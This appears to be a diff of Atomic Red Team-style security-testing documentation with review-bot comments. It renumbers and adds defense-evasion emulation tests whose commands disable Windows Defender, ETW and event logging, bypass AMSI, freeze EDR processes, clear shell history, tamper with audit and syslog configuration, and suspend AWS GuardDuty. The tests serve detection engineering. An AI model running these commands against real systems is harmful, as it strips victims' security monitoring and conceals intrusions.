@@ -1000,7 +1083,7 @@ Set-MpPreference -dbm 0 Set-MpPreference -dscrptsc 0 Set-MpPreference -dbaf 0 ``` -### Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd +### Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd LockBit Black - Disable Privacy Settings Experience Using Registry @@ -1019,7 +1102,7 @@ reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperie ```cmd reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1 ``` -### Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd +### Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd LockBit Black - Use Registry Editor to turn on automatic logon @@ -1044,7 +1127,7 @@ reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1 reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1 ``` -### Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell +### Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell LockBit Black - Disable Privacy Settings Experience Using Registry @@ -1063,7 +1146,7 @@ New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisableP ```powershell Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore ``` -### Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell +### Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell Lockbit Black - Use Registry Editor to turn on automatic logon 
@@ -1088,7 +1171,7 @@ Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore ``` -### Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature +### Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. @@ -1109,7 +1192,7 @@ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestar Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore ``` -### Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder +### Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder The following Atomic will attempt to exclude a folder within Defender leveraging WMI Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ @@ -1129,7 +1212,7 @@ wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference ca ```cmd wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\" ``` -### Atomic Test #38: Delete Windows Defender Scheduled Tasks +### Atomic Test #41: Delete Windows Defender Scheduled Tasks The following atomic test will delete the Windows Defender scheduled tasks. 
@@ -1176,7 +1259,7 @@ schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender V schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml" ``` -### Atomic Test #39: Clear History +### Atomic Test #42: Clear History Clear Shell History. This technique only affect the bash shell application. @@ -1190,7 +1273,7 @@ Clear Shell History. This technique only affect the bash shell application. history -c ``` -### Atomic Test #40: Suspend History +### Atomic Test #43: Suspend History suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell @@ -1209,7 +1292,7 @@ set +o history ```sh set -o history ``` -### Atomic Test #41: Reboot Linux Host via Kernel System Request +### Atomic Test #44: Reboot Linux Host via Kernel System Request reboot system via system request seen in Awfulshred wiper. @@ -1224,7 +1307,7 @@ echo 1> /proc/sys/kernel/sysrq echo b> /proc/sysrq-trigger ``` -### Atomic Test #42: Clear Pagging Cache +### Atomic Test #45: Clear Pagging Cache clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/ @@ -1240,7 +1323,7 @@ free && echo 3 > /proc/sys/vm/drop_caches && free echo 3> /proc/sys/vm/drop_caches ``` -### Atomic Test #43: Disable Memory Swap +### Atomic Test #46: Disable Memory Swap disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux. 
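Review bot: the renumbered heading `+### Atomic Test #45: Clear Pagging Cache` keeps the misspelling "Pagging" (the description under it repeats "pagging cache" twice); since this heading line is being rewritten by the renumbering anyway, correct it to "Clear Paging Cache" here rather than leaving it for a follow-up.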
@@ -1265,7 +1348,7 @@ swapon -a sleep 2 sync ``` -### Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) +### Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI) This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0". The pre-req needs to be ran in order to setup HVCI and have it enabled. @@ -1313,7 +1396,7 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorE reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f ``` -### Atomic Test #45: AMSI Bypass - Override AMSI via COM +### Atomic Test #48: AMSI Bypass - Override AMSI via COM With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist. This is currently being used by AsyncRAT and others. @@ -1335,7 +1418,7 @@ REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InPro ```cmd REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f ``` -### Atomic Test #46: AWS - GuardDuty Suspension or Deletion +### Atomic Test #49: AWS - GuardDuty Suspension or Deletion Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration. 
@@ -1379,7 +1462,7 @@ cat ~/.aws/credentials | grep "default" echo "Please install the aws-cli and configure your AWS default profile using: aws configure" ``` -### Atomic Test #47: Tamper with Defender ATP on Linux/MacOS +### Atomic Test #50x: Tamper with Defender ATP on Linux/MacOS With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide @@ -1398,7 +1481,7 @@ sudo mdatp config real-time-protection --value disabled ```sh sudo mdatp config real-time-protection --value enabled ``` -### Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe +### Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe" @@ -1451,7 +1534,7 @@ reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul ``` -### Atomic Test #49: Tamper with Windows Defender Registry - Powershell +### Atomic Test #52: Tamper with Windows Defender Registry - Powershell Disable Windows Defender by tampering with windows defender registry through powershell 
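Review bot: the renumbered heading `+### Atomic Test #50x: Tamper with Defender ATP on Linux/MacOS` carries a stray "x"; every other heading in this renumbering pass is a bare integer (#49 before it, #51 after it), so this should read `#50`, otherwise anyone navigating by test number, including the atomic runner's index, sees a gap between #49 and #51.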
@@ -1504,7 +1587,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "Tam Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1 Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1 ``` -### Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI +### Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting. @@ -1547,7 +1630,7 @@ if (-not $RequiredModule) {exit 1} Install-Module -Name VMware.PowerCLI -Confirm:$false ``` -### Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune +### Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment. @@ -1580,7 +1663,7 @@ Remove-ItemProperty -Path $registryPath -Name $registryValueName Write-Host "Registry value deleted: $registryValueName" ``` -### Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO +### Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment. 
@@ -1607,7 +1690,7 @@ Remove-ItemProperty -Path $registryPath -Name $newValueName Write-Host "Registry value deleted: $newValueName" ``` -### Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key +### Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0. Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d @@ -1628,7 +1711,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name ```powershell Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null ``` -### Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd +### Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart. @@ -1647,7 +1730,7 @@ reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Applicati ```cmd reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "1" /f ``` -### Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell +### Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart. 
@@ -1666,7 +1749,7 @@ New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Eve ```powershell New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 1 -PropertyType "DWord" -Force ``` -### Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd +### Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart. @@ -1691,7 +1774,7 @@ reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Applicati ```cmd reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "1" /f ``` -### Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell +### Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart. 
@@ -1716,7 +1799,7 @@ New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Ev ```powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force ``` -### Atomic Test #58: Freeze PPL-protected process with EDR-Freeze +### Atomic Test #61: Freeze PPL-protected process with EDR-Freeze This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes. @@ -1882,7 +1965,7 @@ Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | O Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue Write-Output "File deleted: $edrFreezeExe" ``` -### Atomic Test #59: Disable ASLR Via sysctl parameters - Linux +### Atomic Test #62: Disable ASLR Via sysctl parameters - Linux Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux. 
@@ -1901,3 +1984,378 @@ sysctl -w kernel.randomize_va_space=0 ```bash sysctl -w kernel.randomize_va_space=2 ``` + +### Atomic Test #63: Auditing Configuration Changes on Linux Host + +Emulates modification of auditd configuration files + +**Supported Platforms:** Linux + +**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3` + +#### Inputs + +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf| +| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf| +| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf| + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + +```bash +sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name} +if [ -f "/etc/#{auditd_config_file_name}" ]; +then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name} +else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name} +fi +sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name} +``` + +#### Cleanup Commands + +```bash +sed -i '$ d' /etc/audisp/#{audisp_config_file_name} +if [ -f "/etc/#{auditd_config_file_name}" ]; +then sed -i '$ d' /etc/#{auditd_config_file_name} +else sed -i '$ d' /etc/audit/#{auditd_config_file_name} +fi +sed -i '$ d' /etc/#{libaudit_config_file_name} +``` +### Atomic Test #64: Auditing Configuration Changes on FreeBSD Host + +Emulates modification of auditd configuration files + +**Supported Platforms:** Linux + +**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd` + +#### Inputs + +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event| + +#### Attack Commands: Run 
with `sh`! Elevation Required (e.g. root or admin) + +```sh +echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name} +``` + +#### Cleanup Commands + +```sh +sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name} +``` +### Atomic Test #65: Logging Configuration Changes on Linux Host + +Emulates modification of syslog configuration. + +**Supported Platforms:** Linux + +**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c` + +#### Inputs + +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf| +| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf| +| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf| + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + +```bash +if [ -f "/etc/#{syslog_config_file_name}" ]; +then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name} +fi +if [ -f "/etc/#{rsyslog_config_file_name}" ]; +then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name} +fi +if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ]; +then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name} +fi +``` + +#### Cleanup Commands + +```bash +if [ -f "/etc/#{syslog_config_file_name}" ]; +then sed -i '$ d' /etc/#{syslog_config_file_name} +fi +if [ -f "/etc/#{rsyslog_config_file_name}" ]; +then sed -i '$ d' /etc/#{rsyslog_config_file_name} +fi +if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ]; +then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name} +fi +``` +### Atomic Test #66: Logging Configuration Changes on FreeBSD Host + +Emulates modification of syslog configuration. 
+ +**Supported Platforms:** Linux + +**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8` + +#### Inputs + +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf| + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + +```sh +if [ -f "/etc/#{syslog_config_file_name}" ]; +then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name} +fi +``` + +#### Cleanup Commands + +```sh +if [ -f "/etc/#{syslog_config_file_name}" ]; +then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name} +fi +``` +### Atomic Test #67: Disable Powershell ETW Provider - Windows + +This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions. + +**Supported Platforms:** Windows + +**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84` + +#### Inputs + +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe| +| session | The session to disable. | string | EventLog-Application| +| provider | The provider to disable. | string | Microsoft-Windows-Powershell| + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + +```powershell +cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets +``` + +#### Cleanup Commands + +```powershell +cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets +``` + +#### Dependencies: Run with `powershell`! + +##### Description: PSExec must be installed on the machine. 
+ +###### Check Prereq Commands + +```powershell +if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1} +``` + +###### Get Prereq Commands + +```powershell +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null +Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" +expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force +``` + +### Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd) + +Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry + +**Supported Platforms:** Windows + +**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b` + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + +```cmd +REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0 +``` + +#### Cleanup Commands + +```cmd +REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1 +``` +### Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell) + +Disables ETW for the .NET Framework using PowerShell to update the Windows registry + +**Supported Platforms:** Windows + +**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758` + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. 
root or admin) + +```powershell +New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force +``` + +#### Cleanup Commands + +```powershell +REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1 +``` +### Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd + +An adversary can disable the ETW Provider of Windows Defender, +so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. +https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a + +**Supported Platforms:** Windows + +**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41` + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + +```cmd +reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands + +```cmd +reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1 +``` +### Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell + +An adversary can disable the ETW Provider of Windows Defender, +so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. +https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a + +**Supported Platforms:** Windows + +**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02` + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. 
root or admin) + +```powershell +New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force +``` + +#### Cleanup Commands + +```powershell +Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore +``` +### Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd + +Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required. + +**Supported Platforms:** Windows + +**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b` + +#### Attack Commands: Run with `command_prompt`! + +```cmd +REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f +``` + +#### Cleanup Commands + +```cmd +REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1 +``` +### Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell + +Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required. + +**Supported Platforms:** Windows + +**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee` + +#### Attack Commands: Run with `powershell`! 
+ +```powershell +New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force +``` + +#### Cleanup Commands + +```powershell +Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled +``` +### Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd + +Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required. + +**Supported Platforms:** Windows + +**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf` + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + +```cmd +REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f +``` + +#### Cleanup Commands + +```cmd +REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1 +``` +### Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell + +Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required. + +**Supported Platforms:** Windows + +**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911` + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. 
root or admin) + +```powershell +New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force +``` + +#### Cleanup Commands + +```powershell +Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled +``` +### Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table + +Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com. + +**Supported Platforms:** Windows + +**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca` + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + +```powershell +Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" +Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" +Clear-DnsClientCache +``` + +#### Cleanup Commands + +```powershell +try { + # Get all current NRPT rules + $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' } + + # Remove each NRPT rule + foreach ($rule in $DnsClientNrptRules) { + Remove-DnsClientNrptRule -Name $rule.Name -Force + } + + # Clear DNS client cache + Clear-DnsClientCache + Write-Host "All NRPT rules have been removed and the DNS cache has been cleared." +} + +catch { + Write-Host "An error occurred: $_" +} +Clear-DnsClientCache +``` 
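Review bot: in Atomic Test #63 the first and last attack commands append to `/etc/audisp/#{audisp_config_file_name}` and `/etc/#{libaudit_config_file_name}` unconditionally, while only the auditd.conf path is guarded with an `-f` test; on a host where audispd.conf or libaudit.conf is absent those `sed -i` calls fail, and the cleanup's `sed -i '$ d'` then removes a genuine last line from whichever file did exist. Guard every path the way test #65 does and delete by marker in the cleanup (`sed -i '/#art_test_1562_006_1/d'`) as the FreeBSD variant already does. Three smaller points in the same hunk: tests #64 and #66 are titled "on FreeBSD Host", write to `/etc/security/audit_event` and use the BSD `sed -i ""` form, yet declare `**Supported Platforms:** Linux`; test #68's `REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0` omits `/f`, so if the value already exists reg.exe prompts for confirmation and a non-interactive run hangs (the cleanup and tests #72/#74 do pass `/f`); and test #76's description says the test will "respond with 127.0.0.1" for endpoint.security.microsoft.com, but `Add-DnsClientNrptRule -NameServers 127.0.0.1` directs the query to a resolver on loopback rather than returning that address, so unless something is listening on 127.0.0.1:53 the observable effect is a failed lookup, which is what the description should say (the trailing `Clear-DnsClientCache` after the try/catch also duplicates the one inside it).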
diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1685/T1685.yaml similarity index 82% rename from atomics/T1562.001/T1562.001.yaml rename to atomics/T1685/T1685.yaml index 55e5e42d..90249c86 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1685/T1685.yaml 
